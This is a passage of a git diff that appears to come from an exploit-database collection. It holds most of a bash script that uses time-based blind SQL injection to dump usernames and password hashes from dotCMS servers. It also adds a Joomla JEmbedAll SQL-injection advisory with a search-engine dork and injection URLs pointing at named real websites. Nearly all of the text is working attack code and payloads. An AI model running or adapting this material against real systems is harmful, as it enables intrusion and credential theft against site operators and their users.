index=$4 + offset=$5 + column=$6 + avg_delay=$7 + + if [ -z "$offset" ]; + then + offset=1 + fi + + if [[ $char != *"char("* ]]; + then + char="%22${char}%22" + fi + + if [ -z "$column" ]; + then + column="password_" + fi + + # Controls the avg delay of a FALSE + # request + if [ -z "$avg_delay" ]; + then + avg_delay="0.100" + fi + + res=$(curl -k -sS \ + -w " %{time_total}" \ + -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \ + "${target}/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23") + data=$(echo $res | awk '{print $1}') + rtt=$(echo $res | awk '{print $2}') + + # Calculate boolean based on time delay and + # data presence. + has_delay=$(echo "${rtt}>${avg_delay}" | bc -l) + if [ ! -z "$data" ]; + then + if [ $has_delay -eq 1 ]; + then + echo "$char" + fi + fi +} + +testdb() { + target=$1 + res=$(dump_char $target 1 "dotcms" 1 1) + if [ ! -z "$res" ]; + then + echo "dotcms" + else + res=$(dump_char $target 1 "dotcms2") + if [ ! -z "$res" ]; + then + echo "dotcms2" + fi + fi +} + +convert_char() { + char=$1 + conv="$char" + + if [ "$char" == "char(58)" ]; + then + conv=":" + elif [ "$char" == "char(47)" ]; + then + conv="/" + elif [ "$char" == "char(61)" ]; + then + conv="=" + elif [ "$char" == "char(45)" ]; + then + conv="-" + fi + + echo -n "$conv" +} + +a2chr() { + a=$1 + printf 'char(%02d)' \'$a +} + +n2chr() { + n=$1 + printf 'char(%d)' $n +} + +chr2a() { + chr=$1 + chr=$(echo $chr | sed -e 's/char(//g' -e 's/)//g') + chr=`printf \\\\$(printf '%03o' $chr)` + echo -n $chr +} + +iter_chars() { + target=$1 + db=$2 + user=$3 + offset=$4 + column=$5 + for c in {32..36} {38..94} {96..126} + do + c=$(n2chr $c) + res=$(dump_char $target $c $db $user $offset $column) + + if [ ! -z "$res" ]; + then + chr2a $res + break + fi + done +} + +exploit() { + target=$1 + db=$(testdb $target) + + if [ -z "$db" ]; + then + echo "Unable to identify database name used by dotcms instance!" + exit 1 + fi + + echo "Dumping users and passwords from database..." + echo + + for user in $(seq 0 1023); + do + validuser=1 + echo -n "| $user | " + for offset in $(seq 1 1024); + do + res=$(iter_chars $target $db $user $offset "userid") + + if [ -z "$res" ]; + then + if [ $offset -eq 1 ]; + then + validuser=0 + fi + break + fi + + echo -n "$res"; + done + + if [ $validuser -eq 1 ]; + then + printf " | " + else + printf " |\n" + break + fi + for offset in $(seq 1 1024); + do + res=$(iter_chars $target $db $user $offset "password_") + + if [ -z "$res" ]; + then + break + fi + + echo -n "$res"; + done + printf " |\n" + done + echo + echo "Dumping complete!" +} + +target=$1 + +if [ -z "$target" ]; +then + show_usage +fi + +test_exploit $target +exploit $target diff --git a/platforms/php/webapps/41378.txt b/platforms/php/webapps/41378.txt new file mode 100755 index 000000000..c09a27279 --- /dev/null +++ b/platforms/php/webapps/41378.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection +# Google Dork: inurl:index.php?option=com_jembedall +# Date: 16.02.2017 +# Vendor Homepage: http://www.goldengravel.eu/ +# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/ +# Demo: http://www.goldengravel.eu/ +# Version: 1.4 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL] +# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL] +# # # # # + + +http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4' +http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4' + +http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4' +http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4' \ No newline at end of file